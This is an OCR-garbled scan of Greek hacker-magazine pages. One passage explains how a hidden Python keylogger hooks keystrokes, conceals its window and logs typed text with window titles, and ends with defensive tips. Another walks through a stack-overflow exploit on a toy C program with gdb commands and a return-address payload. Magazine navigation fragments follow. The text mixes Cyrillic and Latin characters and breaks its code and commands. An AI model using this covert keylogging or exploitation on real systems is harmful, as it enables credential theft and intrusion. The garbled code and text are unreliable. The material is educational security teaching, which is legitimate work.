γραφτείτε п µαθετε περισσότερα - Opera 4 2014-07 
-09 02:29:17. 695000 
myname&mycompany. Com<TAB>super pass ! xaxaxa<ENTER> 


Eva δεἰγμα ano ra δεδοµένα που συλλέγει ο απλοϊκός deltaLogger. 
Νομίζουμε бт! εἶναι акрас апокалоптіка ;) 


Γραμμές 09 Ewe 37. Edm βρίσκεται η συνάρτηση OnKeyboardEvent(), που καλείται 
οποτεδήποτε προκύπτει το event TOU πατήµατος ενὸς πλήκτρου. Θα μπορούσαμε va 
πούμε ὁτι η συγκεκριμένη συνάρτηση апотелеі ката κάποιον τρόπο τον πυρήνα της 
εφαρμογἠς µας. 


Στις πρώτες δύο γραμμὲς της συνάρτησης (10 και 11) δηλώνουμε τη χρήση των 
καθολικών μεταβλητών lastWindow και log, που ορίστηκαν EKTOG της συνάρτησης. 
Αμέσως μετὰ (13) ορἰζουμε µια µεταβλητἠὴ µε то буора window, στην οποία δίνουμε 
ως τιμή την ιδιότητα WindowName, του σχετικού event. Όπως σίγουρα θα μαντέψα- 
τε, η ιδιότητα αυτή επιστρέφει τον τίτλο του παραθύρου στο οποίο προκλήθηκε то 
συμβὰν (το πάτημα κάποιου πλήκτρου). Εν συνεχεία (γραμμὲς 14 Ewe 28) ξεκινάει 
μια µακροσκελἠς δομἠ ελέγχου, ὀπου εξετάζουμε τον κωδικὀ ASCII του εκάστοτε 
event. Ως γνωστὸν, o κωδικὸς αυτός αποτελεὶ ша αριθµητικἡ τιµή που µας evn- 
μερώνει για το ποιο πλήκτρο πατήθηκε. Архіка (14) εξετάζουμε το ενδεχόμενο va 
πατήθηκε το πλήκτρο [Esc] (κωδικὸς ASCII 27). Σε αυτὴ την περίπτωση καλούμε 
τη συνάρτηση WriteLog(), nou θα εξετάσουμε αργὀτερα, κι αµέσως μετὰ терцаті- 
ζουμε то πρὀγραμμα. Ουσιαστικά, το πλήκτρο [Esc] τερματίζει τη λειτουργία του 
deltaLogger. Στις επόμενες γραμμὲς εξετάζουμε διάφορα ἄλλα ενδεχόμενα για το 
πλήκτρο nou πατήθηκε. Av πρὀκειται για πλήκτρο που αντιστοιχεί σε εκτυπώσιμο 
χαρακτήρα, αποθηκεύουµε астоу τον χαρακτήρα στη μεταβλητὴ key. Αν πρὀκειται 
για πλήκτρο ὀπως ro [Enter], το [TAB] к.а, αποθηκεύουμε στη μεταβλητή key µια 
περιγραφή του πλήκτρου. Ενδιαφέρον παρουσιάζει η γραμμή 23, ónou εξετάζου- 
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µε το ενδεχόμενο va πατήθηκε πλήκτρο ре кобіко ASCII ico µε TO μηδέν. Τέτοια 
πλήκτρα εἶναι τα βελάκια, ro [Ctrl] к.а. Σε αυτὲς τις περιπτώσεις η μεταβλητἠ key 
паіру ως TIMA Eva κενὀ string. 


Όπως υποψιάζεστε, каде φορά που πατιέται κἄποιο πλήκτρο το περιεχόµενο της HE- 
ταβλητἠς key προστίθεται σε εκεϊνο της μεταβλητὴς log. Н σχετικἠ πράξη Φαίνεται 
στη γραμμὴ 34. Πριν απ' аот την προσθήκη, óuoc, προηγείται ἑνας ἐλεγχος (30). 
Τσεκάρουµε av το παράθυρο апо το οποίο προήλθε ro event της πληκτρολὀγησης 
ἐχει τον ἰδιο τίτλο µε το παράθυρο апо то onoio εἶχε προέλθει το προηγούμενο 
event. Αν ὀχι, προσθέτουμε στη µεταβλητήὴ log τον тітЛо του παραθύρου ка! TNV фра 
nou NPOEKUWE ro συμβάν. Με auróv τον τρόπο, το αρχεἰο καταγραφής nou σχηματί- 
ζεται θα µας κατατοπἰζει µε каде λεπτομέρεια για το τι πληκτρολογήθηκε, NOTE kai 
σε ποιο παράθυρο. 


Στη γραμμὴ 35 τσεκάρουµε av το περιεχόµενο της µεταβλητὴς log ἐχει ξεπεράσει 
то ὁριο των 200 χαρακτήρων. Εφόσον συμβαίνει кат! τέτοιο καλείται η συνάρτηση 
WriteLog() και η μεταβλητή log αρχικοποιεἰται. Ουσιαστικά, σε αυτὲς τις γραμμὲς 
εξασφαλἰζουµε бт! το αρχείο καταγραφἠς rou deltaLogger θα σχηματίζεται типнаті- 
ка και ava 200 περίπου χαρακτήρες. Ἔτσι δεν προκαλείται μεγάλη επιβάρυνση στο 
σύστημα, αφού αποτρέπουµε την εγγραφἠ σε каде πάτημα πλήκτρου. Ταυτόχρονα, 
αν ο keylogger µας τερµατιστεἰ απροσδὀκητα, θα χάσουμε Eva σχετικἀ кро τµήµα 
των καταγεγραμμένων δεδομένων. 


Γραμμές 39 ἑως 43. Edm βρίσκεται η συνάρτηση WriteLog(), nou ἐχει μάλλον 
προφανὴ λειτουργία. Αρχικἁ δηλώνουμε τη χρήση της καθολικἠς µεταβλητὴς log κι 
ακολούθως ανοίγουμε ro αρχείο καταγραφἠς (keylogs.txt) για προσθήκη ("a", апо 
TO append). Н συνάρτηση ολοκληρώνεται µε την εγγραφἠ του περιεχομένου της log 
στο αρχεἰο και το κλεἰσιμὀ του. 


Γραμμές 45 και 46. Прота δημιουργούμε Eva αντικείμενο, yia το παράθυρο της 
γραμμὴς £vroAov που εμφανίζεται ката την εκτέλεση του deltaLogger. Αμέσως нета 
τροφοδοτούμε το συγκεκριμένο αντικείµενο στη συνάρτηση ShowWindow, μαζὶ µε 
την παράμετρο 0. Έτσι, πετυχαϊνουμε την απὀκρυψη του παραθύρου κι εξασφα- 
λίζουμε бт! η λειτουργία rou keylogger δεν θα γίνεται αντιληπτή ano évav αρχά- 
pio χρήστη. Φυσικά, αν ανοϊξουµε τη διαχείριση εργασιών του συστήματος ενόσω 
εκτελείται ο deltaLogger, θα διαπιστώσουμε Ori η αντίστοιχη διεργασία της Python 
εµφανίζεται κανονικἀ. 


Γραμμές 47 έως 50. Εδὠ αξιοποιούµε τη βιβλιοθήκη pyHook, ὥστε να επιβάλλουμε 
την εκτέλεση της συνάρτησης OnKeyboardEvent() κάθε φορά που nari£rai ἑνα πλἠ- 
κτρο. Ιδιαίτερη σημασία ἐχει η χρήση της συνάρτησης pythoncom.PumpMessages(), 
η οποία аутлеі ra keyboard events καθολικἁ апо το λειτουργικὀ σύστημα. Ἔτσι, TO 
πρὀγραμμά µας καταφέρνει να καταγράψει ra πατήματα πλήκτρων σε κάθε cpap- 
poyn. 


Аутіцетра 


Αυτό ἦταν ὀλο! Με ελάχιστο κὠδικα катафёране να δημιουργήσουμε Evav λειτουρ- 
γικὀ keylogger. Μπορεὶ να µην εἶναι το εργαλείο που θα χρησιμοποιούσε Evac npay- 
ματικὸς κατάσκοπος, αλλά av το χρησιμοποιήσετε για λίγο σε δικὀ σας υπολογιστή 
θα πάρετε ша калд γεύση апо το εὖρος και την κρισιμότητα των δεδομένων που 
μπορεί να συλλέξει. 
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Οι live διανομές Linux, σε συνδυασμό μ' éva εικονικὀ πληκτρολόγιο, 
αποτελούν ша калп λύση για την ano@uyn πιθανών keyloggers. 


Eivai φανερό, λοιπὸν, бт! στο σὐστημά µας θα πρέπει να τρέχει πάντα κάποιο ενη- 
μερωμένο antimalware. Av δεν εργαζὀµαστε σε біко µας υπολογιστή και δεν uno- 
ρούμε να εἰμαστε σίγουροι yia την GOMAAEIG του, μπορούμε να προφυλαχτούμε 
ano software keyloggers µε τη χρήση live διανομών Linux. Πα πρόσθετη ασφάλεια, 
μάλιστα, θα μπορούσαμε va εισάγουµε κωδικούς και άλλα κρίσιμα δεδοµένα апо 
va EIKOVIKO πληκτρολόγιο кі ὀχι апо το αληθινὀ. Τέλος, στις περιπτώσεις δημόσιων 
UNOAOYIOTWV μπορούμε να αξιοποιούμε και τους κωδικούς µιας χρήσης — σε όσες 
υπηρεσίες τους υποστηρίζουν. Παλαιότερα και бе δοκιµαστικὀ επἰπεδο η Google εἶχε 
παρουσιάσει µια τἐτοια υπηρεσία, µε то буора Google Sesame. Н εν λόγω υπηρε- 
σία απαιτούσε την κατοχἠ κινητού τηλεφώνου, το οποίο θα έπρεπε va ἐχει δηλω- 
Ogi ὁτι ανήκει στον αντἰστοιχο χρήστη και να διαθέτει πρόσβαση στο διαδίκτυο. O 
χρήστης nou ἠθελε να συνδεθεὶ апо κάποιον δημόσιο υπολογιστή μετέβαινε στη 
σελἰδα http://accounts.google.com/sesame кі εκεὶ εμφανιζόταν ἑνας κωδικὀς QR, που 
ἀλλαζε αυτόματα σε μικρὰ και такта xpovikà διαστήματα. O χρήστης σάρωνε τον 
KWOIKO µε TO κινητὸ του τηλέφωνο κι ο browser της συσκευής τον μετέφερε σε µια 
σελίδα της σχετικὴς υπηρεσίας της Google. Εκεἰ ο χρήστης μπορούσε να πατήσει 
TO κουμπὶ σύνδεσης και μόλις συνέβαινε кат! τέτοιο ο δημόσιος υπολογιστής апо 
τον οποίο εἶχε ξεκινήσει η διαδικασία πραγματοποιούσε login αυτομάτως! Έτσι, ο 
χρήστης μπορούσε να συνδεθεί στο email του µε απόλυτη ασφάλεια και χωρίς va 
πληκτρολογήσει τίποτα και πουθενὰ. О γράφων εἰχετην τύχη να δοκιμάσει σε πρῶτο 
χέρι τη συγκεκριμένη υπηρεσία, η οποία δυστυχὠς μετὰ апо λίγες ημέρες катарүй- 
θηκε. Ελπίζουμε βἐβαια να δούμε την επαναφορά της σύντομα και μάλιστα να βρει 
αρκετούς μιμητές. 


Καλὲς біакопёс και... keep typing ;) 
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H ηλεκτρονική EKOOON του deltaHacker δεν 


έχει καμία σχέση µε Ол! έχετε δει ως τώρα. 


Είναι portable KAI searchable = 


Επιτρέπει την КІ αντιγραφή κειμένου, αλλά καὶ 
την EKTUNWON. 


Είναι радае ro'óT- Tess και δείχνει Τέλεια παντού. 
στο tablet, στο smartphone και φυσικά στον υπολογιστή, 


A! n ηλεκτρονική EKOOON του deltaHacker 


δεν φέρει τεχνητούς περιορισμούς και 
δεν τιμωρεί τον катохо της, 


Στηρίξτε τη δουλειὰ рас κι επιτρέψτε μας να τη 
συνεχίσουμε. 


Ф 
Αποκτήστε τωρα μία απὀ τις ηλεκτρονικές 
συνδρομές στο περιοδικό deltaHacker. 
Кі εσείς. 


http://deltahacker.gr/pdf12order 


by Deorgg ef the Jun ү 
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Επίδειξη stack overflow ora Windows 


سے 
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Στο deltaHacker 032 ξεκινήσαμε µια σχετικά μεγάλη και εις βάθος θεωρητικἠ 
εισαγωγἠ oro stack overflow. Εἶναι πολλά που έχουν γραφτεί γι' αυτὸ 
το εξαιρετικἁ ενδιαφέρον φαινόμενο — και πολλά θα γραφτούν ακόµα. 
Πράγματι, η καθημερινότητα αποδεικνύει ότι, av µη τι ἄλλο, 
πολλὲς επιτυχημένες επιθέσεις σε συστήματα 
ξεκινούν ano την υπερχείλιση της στοίβας. 


"Photo credit: The 0.5. National Archives / Foter / No known copyright restrictions" 


Επίδειξη stack overflow στα Windows 
LLL dk κκ 


Πριν βέβαια апо την πρόκληση stack overflow πρέπει να ικανοποιούνται µια σειρά 
ano συνθήκες. Κάτι τέτοιο δεν εἶναι απίθανο va συμβεί, αρκεἰ va γνωρἰζουμε την 
αρχιτεκτονικἠ των εκτελἐσιμων αλλά κι QUTÎ του λειτουργικού συστήματος που та 
φιλοξενεἰ. 


Στο ардро nou αρχίζει апо τη σελἰδα 44 του τεύχους 032 προκαλέἑσαµε την EKTEAE- 
ση µιας συνάρτησης (Function1), η οποία ἦταν τοποθετημένη µέσα στον κὠδικα του 
προγράμματος και σε κανονικὲς συνθήκες δεν θα εκτελούταν ποτὲ. (Δεν υπάρχει 
καν EVTOAN κλήσης της.) Kai noc ӧрос̧ εκτελέστηκε; Στο σημείο nou το проуранца 
μάς ζητούσε va πληκτρολογήσουμε οτιδήποτε, µε σκοπὸ η εἰσοδος va τοποθετηθεὶ 
στη μεταβλητἠ τύπου array μεγέθους 10 χαρακτήρων, εμεὶς δώσαμε πολλούς περισ- 
σότερους апо τους επιτρεπόµενους προκαλώντας, ἐτσι, υπερχείλιση στοίβας. Ακρι- 
Boc στο τέλος του αλφαριθμητικού εισόδου παραθέἑσαµε ro string "\x20\x15\x40\ 
x00", χωρὶς τα εισαγωγικἀ. Αν το διαβάσουμε ανάποδα βλέπουμε бт! πρὀκειται για 
τη διεύθυνση 0x401520, η опоіа εἶναι ro EntryPoint της Functioni. (Н στοίβα εἶναι 
δομή LIFO, Last In First Out, γι’ асто και το διαβάζουμε ανάποδα.) Апо το ібіо ардро 
έγινε фауєро Ori σε κάποιες γλὠσσες προγραμματισμού υπάρχουν εντολὲς που δεν 
εἶναι ασφαλείς. Συζητήσαμε, συγκεκριμένα, για την gets() της С, η οποία σε καμία 
περίπτωση δεν μπορεί να θεωρηθεἰ ως ασφαλἠς. Το θέμα εδὠ εἶναι бт! οι (σχετικἀ) 
πρόσφατες εκδόσεις των Windows ενσωματώνουν μηχανισμούς προστασίας ката 
του stack overflow (βλ. DEP, Data Execution Prevention). Αναρωτιέστε τι σημαίνει 
αυτό; Oa σας πούμε εμεὶς τι σηµαίνει: Πολλά και διάφορα, αλλά ειδικά για την πε- 
ρἰπτωσὴ µας бт! δεν εἶναι καθόλου εὐκολο να κάνουμε µια калп πρακτικἠ επίδειξη 
του φαινομένου της υπερχείλισης στοίβας. Υπάρχει uoAaraüra τρόπος MOTE *kai* 
στα Windows να μείνουμε “ка!” την επἰδειξἠ µας να κάνουμε. Н κἰνηση-κλειδἰ εἶναι 
va εγκαταστήσουμε στα Windows va πλήρες περιβάλλον nou εξομοιώνει το Linux. 


Περιβάλλον Linux, αλλά στα Windows 


Το περιβάλλον για τους πειραματισμοὺς µας παρέχεται апо το Cygwin και συγκε- 
κριµένα апо την 32µμπιτη εκδοχἠ του (Cygwin32, http://cygwin.com/setup-x86.exe). 
Πριν ξεκινήσει το κυρίως μέρος της εγκατάστασης, o installer ζητά апо τον χρήστη 
να επιλέξει packages. Καλού κακού, προτείνουμε να τσεκάρετε κι *OAOKANPO* το 
Development package. 


Мета την εγκατάσταση, το Cygwin32 βρίσκεται като апо τον κατάλογο C:\Cygwin32 
— εκτὸς KI ау ορἰσατε διαφορετικἠ διαδροµἠ. Όπως και στο Linux, ETO! κι £00 υπάρ- 
Χει το home directory και η πλήρης διαδρομή του εἶναι η C:\Cygwin32\Home. Μέσα 
στο Home βρίσκεται κι ο κατάλογος µε ro username του χρήστη. Екеі ακριβώς θα 
δημιουργήσουμε TO αρχεἰο µε TOV κὠδικα (σε C) για τους πειραματισμούς µας. Εμεὶς 
το έχουμε ονομάσει StackOverflow.c και τα περιεχὀμενὰ του εἶναι τα ακόλουθα: 


include <stdio.h> 
include <stdlib.h> 


void Function1() 


{ 
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printf("deltaHacker Magazine!\n"); 


} 
void GetUserInput() 


{ 
char buffer[10]; 


gets(buffer); 
puts(buffer); 


int main(void) 
{ 
GetUserInput(); 


return 0; 


С Cygwin Setup - 


Select Packages 
Select packages to install 


senl ew 


Category New B... | S. | Sze Package 
ΕΙ All ёў Default 

Accessibility 4¥ Default 

Admin ёў Default 

Archive ёў Default 

Audio ёў Default 

Base ёў Default 

Database ёў Default 


гам — i 


Devel ёў Default 


Editors ёў Default 

Games ёў Default 

GNOME 4 Default 

Graphics &Y Default 

Interpreters 4} Default 

КОЕ 4% Default 
Εικόνα 1. 
Εγκατάσταση του περιβάλλοντος Cygwin32. Kara τη 
διαδικασία rou setup προτείνεται va επιλέξουμε ОЛО то 
development package, WOTE va &iuaore σίγουροι От! 


έχουν εγκατασταθεί όλα τα εργαλεία που χρειαζόμαστε 
(κυρίως ο compiler ki ο debugger). 
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Επίδειξη stack overflow στα Windows 
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Н ора του πειράματος 
Χωρίζουμε την παρουσἰασἠ µας σε βήματα. 


Βήμα 1. Ας μεταγλωττίσουµε то StackOverflow.c, πληκτρολογώντας στο Command 
Prompt τα ακόλουθα: 


gcc -mpreferred-stack-boundary-2 -ggdb -o StackOverflow StackOverflow.c 


Εικόνα 2. 

Μεταγλωτίζουµε το αρχείο πηγαίου Κὠδικα StackOverflow.c yia να πάρουμε το εκτελέσιμο 
(executable) που στη συνέχεια θα требойие και да δοκιµάζουµε διάφορα μεγέθη αλφαριθμητικὠν, 
EWG órou βρούμε εκείνο ro μήκος αλφαριθμητικού που δίνει stack overflow (segmentation fault). 


Βήμα 2. Мета τη μεταγλώττιση παἰρνουµε το StackOverflow.exe και yia να το Tp£- 
ξουµε πληκτρολογούμε 


./StackOverflow.exe 


Διαπιστώνουμε πως av δώσουμε EWC και 13 στο πλῆθος характпрес δεν прокалеі- 
ται segmentation fault, δηλαδή óAa εἶναι кала. Αν ӧрос̧ δώσουμε πάνω апо 13 στο 
πλήθος χαρακτήρες τότε έχουμε και segmentation fault. Асто βέβαια δεν σηµαίνει 
ότι έχουμε επικαλύψει τη διεύθυνση επιστροφἠς. Το πόσους ακριβώς χαρακτήρες 
θα χρειαστεἰ να πληκτρολογήσουμε μέχρι να επικαλύψουμε τη διεύθυνση αυτή, θα 
το διαπιστώσουμε παρακολουθώντας τις τιμές της στοίβας µέσα ano rov Debugger 
(gdb): 


gdb StackOverflow.exe 


С р zx" 


(core dumped) 


Εικόνα З. 

Παρατηρούμε OT! ие μήκος αλφαριθμητικού 13 “дву” παίρνουμε segmentation fault, кі аито пара то 
γεγονός От! το μέγεθος rou buffer που ορἰζεται στον κώδικα eivai 10 χαρακτήρες. Av диас πληκτρο- 
λογήσουμε Eva ελαφρώς μακρύτερο αλφαριθμητικὀ, τότε πράγματι προκαλούµε stack overflow! 
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Βήμα 3. Θέλουμε να βρούμε Tic διευθύνσεις апо τις опоіес ξεκινούν οι συναρτήσεις 
main() και GetUserInput(), οπότε στο περιβάλλον του gdb πληκτρολογούμε, διαδο- 
χικά: 


(3) disas main 
(*) disas GetUserInput 
Av ὀλα εἶναι кала, θα δείτε ша εικὀνα σαν την 4. 


void GetUserlnput ( ) 


9; 
1 
1 
2 


Εικόνα 4. 

Μέσω Tou gdb φορτώνουμµμε το αρχείο StackOverflow.exe yia va 
npoBoüUpue στο disassembling των συναρτήσεων του кодка, µε 
σκοπὀ να δούμε пой θα βάλουμε Ta breakpoints ὥστε να εξετάσου- 
µε τη στοίβα πρὶν και µετά την gets(). 


Προσέξτε τις διευθύνσεις: Н main ξεκινάει апо τη Ox4011c2 και τελειώνει στη 
0x4011d5, ενώ η GetUserInput ξεκινάει ano τη 0х4011а4 και τελειώνει στη 0х4011с1. 
Едо σημειώσουμε τα εξἠς: Апо τη διεύθυνση 0х4011са της main() πάμε στη διεύ- 
θυνση 0х4011а4 (εντολἠ call 0х4011а4 <GetUserInput>). Όταν τελειώσουμε µε τη 
GetUserInput поў πάμε; Μα, συνεχίζουμε апо τη διεύθυνση Ox4011cf και μετὰ. Ao- 
yık εἶναι, ἄλλωστε. Συνεχίζουμε µε αυτό nou EXE! απομείνει να εκτελεστεἰ. 


Βήμα 4. Εἰμαστε ἐτοιμοι να δούµε τα περιεχόμενα της στοίβας και να βρούμε αυτὴ 
την πολυπόθητη διεύθυνση επιστροφής. 


28 


Επίδειξη stack overflow στα Windows 
PPP 


0x00401 


3 — 
о m ‹ 
muo 


~ < 0 


са 
Теа 


) mu 


x4011b0 


LLU 


ОХЎ01100: 


0x004011icf 


Εικόνα 5. 

Έχουμε βάλει To breakpoint στη διεύθυνση Ox4011b0, ακριβώς δηλαδή στην 
gets(). Ακόμα δεν ἔχουμε γεμίσει τη στοίβα µε kánoio τυχαίο αλφαριθµητικὀ κι 
επομένως η διεύθυνση επιστροφἠς (0x004011cf) δεν ἐχει καταστραφεί... 


Προκειμένου va σχηματιστεὶ η δοµἠ της στοίβας, ακόµη και σε kevi µορφή, θα np£- 
πει να εκτελεστεἰ το πρόγραμμα. Επειδἠ ецеіс θέλουµε v' αναγνωρίσουμε τη στοίβα 
πριν γεμίσει χαρακτῆρες (апо την εἰσοδο του χρήστη), ας βάλουμε Eva breakpoint 
στη διεύθυνση 0x4011b0, екеі δηλαδή που η gets() περιμένει να πληκτρολογηθεὶ 
κάτι. Στον gdb, το breakpoint μπαίνει ἐτσι: 


break * 0x4011b0 
Όπως фаіуетаі και στην εικὀνα 5, δίνοντας στον debugger 
run 


αμέσως "σκάει" το breakpoint που βάλαμε. Ακριβώς εκείνη τη στιγμή πληκτρολο- 
γούμε 


x/8xw $esp 
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και βλέπουμε τη δημιουργημένη, ἄδεια στοίβα. AUTO που Φαίνεται εἶναι ὁτι η στοίβα 
εμπεριέχει (hardcoded) τη διεύθυνση επιστροφἠς Ox4011cf. Όπως ἐχουµε ἠδη πει, 
αφού γεμἰσουμε τη στοἰβα το λειτουργικὀ πρέπει να γνωρίζει σε ποιο σημείο του 
προγράμματος πρέπει να επιστρέψει WOTE να συνεχιστεἰ η φυσιολογικἠ pon της 
εκτέλεσης του προγράµµατος. Παρεμπιπτόντως, апо αυτή τη διεύθυνση (Οχ4011ς{) 
και μετὰ μένουν μονάχα τρεις γραμμὲς yia να τερματιστεί το πρὀγραμμα. Упеуду- 
μίζουμε бт! εἰμαστε στο σημείο rou breakpoint: Δεν ἐχουμε ακόμα πληκτρολογήσει 
κάτι για να καταχωρηθεί στη στοίβα. 


Βήμα 5. Σ' αυτό το σηµείο πατάμε το [S] και μετὰ ro [Enter]. Тора μπορούμε va 
πληκτρολογἠήσουμε οτιδήποτε, ὥστε να καταχωρηθεί στη στοίβα. Eueic δώσαμε το 
ακόλουθο string, μήκους 18 χαρακτήρων: 


AAAAAAAAAABBBBCCCC 


0х002‹: 
0х002 
0x00000001 
0x0028d404 
0x00000000 


UxU028abf6 
0x42424242 
0x00000001 
0x0028d404 
Суу 00000000 


(GUD, | 


Εικόνα 6. 


Ox8003aRbn 
0002011 


0х0090 


0х41414141 
0x0028ac00 
UXUUZOdCz ‹ 
0» 000002 
0x0050279e 


Мета το прото breakpoint, η στοίβα птау áó&ia. Στη συνέχεια η ροή εκτέλεσης rou προγράἀμ- 
ματος συνεχίστηκε kai µας επετράπη va πληκτρολογήσουµε Eva οποιοδήποτε αλφαριθµητικὀ. 
Εμείς δώσαμε то "AAAAAAAAAABBBBCCCC" (χωρίς τα εισαγωγικά), µε αποτέλεσμα η διεύ- 
θυνση επιστροφἠς να γίνει 0x43434343. Αυτοί εἶναι οι τέσσερις τελευταίοι χαρακτήρες апо 
το string που δώσαμε. Πλέον, o debugger δεν εἰναι бе θέση να γνωρίζει σε ποιο σηµείο TOU 
προγράμματος πρέπει να επιστρέψει, шас και δεν υπάρχει πουθενὰ η διεύθυνση 0x43434343. 
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Στη συνέχεια NANKTPOAOYNOGHE την EVTOAN 
x/20xw $esp 


MOTE να δούμε пос EXE! διαμορφωθεί η στοἰβα. Διαπιστώσαμε От! η αρχικἠ διεύθυν- 
ση επιστροφἠς (Οχ401 168) δεν υπάρχει και στη θέση της εἶναι η διεύθυνση 


0x43434343 


Napatnpnote oT! ro 43 43 43 43 εἶναι η δεκαεξαδικἠ αναπαράσταση rov χαρακτή- 
pov CCCC. 


Ti συμβαίνει εδώ; Οι 4 στο πλήθος телестаісі χαρακτήρες επικἄάλυψαν τη διεύθυνση 
επιστροφἠς και тора το λειτουργικὀ θα νομίζει ὁτι πρέπει να επιστρέψει σ' GUTH τη 
διεύθυνση. Н ζημιά ἐγινε και την επιβεβαιώνει o Instruction Pointer (IP), ο οποίος ως 
επόμενη διεύθυνση δείχνει τη 0x43434343. Προκειμένου να δούμε το περιεχόμενο 
του ІР μπορούμε va πληκτρολογήσουμε 


print /x феір 


Δίνοντας ξανὰ [5] και [Enter] παίρνουμε Eva μήνυμα nou µας ενημερώνει ὁτι TO 
πρὀγραμμα δεν µπορεὶ va προσπελάσει τη διεύθυνση 0x43434343 για va συνεχίσει. 


Ἐχει φτάσει η µεγάλη στιγμή. Θα αλλάξουμε τη διεύθυνση 0x43434343 µε αυτὴ апо 
την опоіа ξεκινά η συνάρτηση Functioni(). Пос θα την αλλάξουμε; Μα, ἐμμεσα, pu- 
ока. Πα την ακρἰβεια, θα τη βάλουμε στη θέση των 4 τελευταίων χαρακτήρων και 
μάλιστα τη στιγμὴ που θα πληκτρολογούμε το string εισόδου. 


Δίνοντας Aoinóv ёха ειδικἀ διαμορφωμένο string πετυχαΐνουμε την εκτέλεση της 
συνάρτησης Functioni(), η οποία υπό φυσιολογικὲς συνθήκες —ónAaór µε βάση 
τη διάρθρωση και τη λογική του απλού µας προγράµµατος-- δεν θα εκτελούταν 
ποτὲ. Γενικά, GUTO που KGVOUHE αποτελεὶ εκμετάλλευση ενὸς κενού ασφαλείας που 
οφείλεται στην επιπὀόλαιη χρήση µιας επισφαλούς συνάρτησης. То παρἀδειγμά рас 
βέβαια εἶναι εξαιρετικά --για να µην πούμε εκνευριστικἁ-- απλὀ, ὠστόσο аста εἶναι 
η αρχἡ rou exploitation: Na βρἰσκεις τρόπους για να χρησιμοποιείς (εκμεταλλεύὐεσαι) 
λάθη που ¿xouv κάνει oi проурарнатістёс ἡ οι δημιουργοὶ γενικότερα. 


Па να πετύχουμε λοιπὸν την ἐμμεση εκτέλεση της Рупсёіопі(), θα χρειαστούμε 
прота απ' óÀa τη διεύθυνση ие το EntryPoint της. 


Πληκτρολογούμε στα γρήγορα την εντολἠ 
disas Function1 
κι ἔχουμε το ακὀλουθο αποτέλεσμα, ὁπως φαίνεται και στην εικόνα 7. 


To EntryPoint της Functioni() εἶναι η διεύθυνση 0x401190. Ας βγούμε тора απο rov 
gdb πληκτρολογώντας την εντολἠ exit κι απαντώντας καταφατικἀ στην ερὠτηση 
για то αν θἐλουµε va τερματίσουμµε το ενεργὀ process. Έφθασε η µεγάλη στιγμὴ για 
то μικρὸ µας exploitation. Στο Command Prompt των Windows, πληκτρολογήστε: 


printf "AAAAAAAAAABBBB\x90\x11\x40\xee" | ./StackOverflow. exe 
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Y НАФКЕ 


ANN 


function Functioni: 
push %ebp 


401 


0x004011a2 
0x004011 


Εικόνα 7. 

Στα γρήγορα κάνουμε кі Eva disassembling της µυστικής 
Function1(), µε σκοπὀ να βρούμε τη διεύθυνση rou EntryPoint 
της. Αντί yia τους χαρακτήρες CCCC, που ὁπως вібаие γεμίζουν 
τη διεύθυνση επιστροφἠς, θέλουμε να δώσουμε το EntryPoint 
της Functionl() ώστε να εκτελεστεί ακόµη кі αν αυτό δεν npo- 
βλέπεται ano τη δομή του προγράµµατος. 


AAAAAABBBB x90 x11 х40“ x00" 
(а 


hop c» 


Εικόνα 8. 

To uikpó µας exploitation πέτυχε! Н µυστική συνάρτηση 
Functioni() εκτελέστηκε επιτυχώς, δίνοντας στο τέλος TOU 
αλφαριθμητικού ro string \х90\х11\х40\х00. Αν το διαβάσουμε 
ανάποδα βλέπουμε От! πρὀκειται για τη διεύθυνση 0x401190, η 
οποία εἶναι το EntryPoint της Function1(). 


Ως δια μαγείας, εκτελέστηκε και η Function1()! Εντάξει, μετά апо боа συζητήσαμε 
και δείξαμε, σίγουρα δεν μπορούμε να μιλάμε για μαγεία. Πάντα ὁμως µας προκαλεί 
ша κἀποια ἐκπληξη то пас εἶναι δυνατὸν να εκμεταλλεύονται κἄποιοι Ta проүрар- 
ματιστικὰ (κι OX! μόνο) λάθη των ἄλλων ανθρώπων, προκειµένου να πετύχουν τους 
σκοπούς τους. Πα παράδειγµα, σε Eva πιο ρεαλιστικὀ σενάριο κἄποιος επιτιθέµε- 
νος θα μπορούσε va ανακατευθύνει τη рой εκτέλεσης του προγράμματος σε ἄλλα, 
σκοτεινά μονοπάτια. Ξέρετε κάτι; Δεν ξέρουμε γιατὶ, αλλά αυτή τη στιγμή ο ὀρος 
"shellcode" ἦλθε oro προσκήνιο της σκέψης µας... Νομίζουμε OT! σύντομα θα έχουμε 
να πούμε αρκετά γι’ αυτόν. Ὠπα, ψέμματα: Δεν το νομµίζουµε — σίγουρα θα πούμε 
αρκετά yia shellcodes ;) 
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deltaHacker 033 - Crypto-Summer Edition 2 B — 


Posted by subZraw | 30/06/2014, 10:10 | Published in issues | Edit Προφίλ στα forum 


Διαχείρισ Ñ Rj Στο προηγούμενο τεύχος πραγματοποιήσαμε µια πρώτη γνωριμία µε 
τους patchers -- και τώρα εµβαθύνουμε! Ξεκινάμε τη µελέτη µας από τη 

Αποσύνδεση δοµή των εκτελέσιµων αρχείων των Windows κι αφού κατανοήσουμε πώς 
είναι οργανωμένο το περιεχόμενό τους αναλύουµε μερικά τεχνάσ 


που επιστρατεύουν οι ισχυροί patchers. Ακόμα κι αν δεν ск 
е site = φτιάξετε ποτέ κάποιο παρόμοιο εργαλείο, πιστεύουμε ÓT 
or θα σας δώσουν πολλές ενδιαφέρουσες ιδέες και θα 
πιο πονηρούς -- πάντα µε την καλή έννοια :Ὁ 
deltaHacker 032 - #DropDropbox Ec € 


Posted by subZraw | 31/05/2014, 20:05 | Pu 


Διαχε 


Н φράση 'ό,τι κλειδ 


νέο τεύχο, 
XOS video Casting ν νέο vid. 
€0 tutorial 


slash ç 


ῬῬία deltaCast fora ç 
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/05/2014, 10:00 Publi Google Site-search 


Αντικατάσταση του Em 
Ποιούμε, O στόχος 
τον έλεγχο τ 


16 ευκολίες mo, ων 


V παρέχει о P. by 
&reengloi 


15 Πρόσφατα 


Πλήρη άρθρα που συμπληρώνουν το περιοδικό [addenda]. To video 
podcast [netcasting Э deltaCast episodes]. Άρθρα που µας 
ήρθε να γράψουμε, έτσι, απλά [slash >  /dev/random]. Ta προ- 
κλητικά mind hacks. Τα βίντεο από τα προηγούμενα live streams 
[netcasting Э deltaStream]. Ολόκληρα blasts from the past 
[slash Э var/backup/old]. Τα πάντα ενδιαφέροντα forums. To 
σημείο συνάντησης για τους φίλους του περιοδικού. 
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Πόσες και πόσες φορές ο νόμος της βαρύτητας δεν ἐχει καταφέρει va 
καταστρέψει τη διἀθεσἠ µας προσωρινά — και για πάντα µια апо τις 
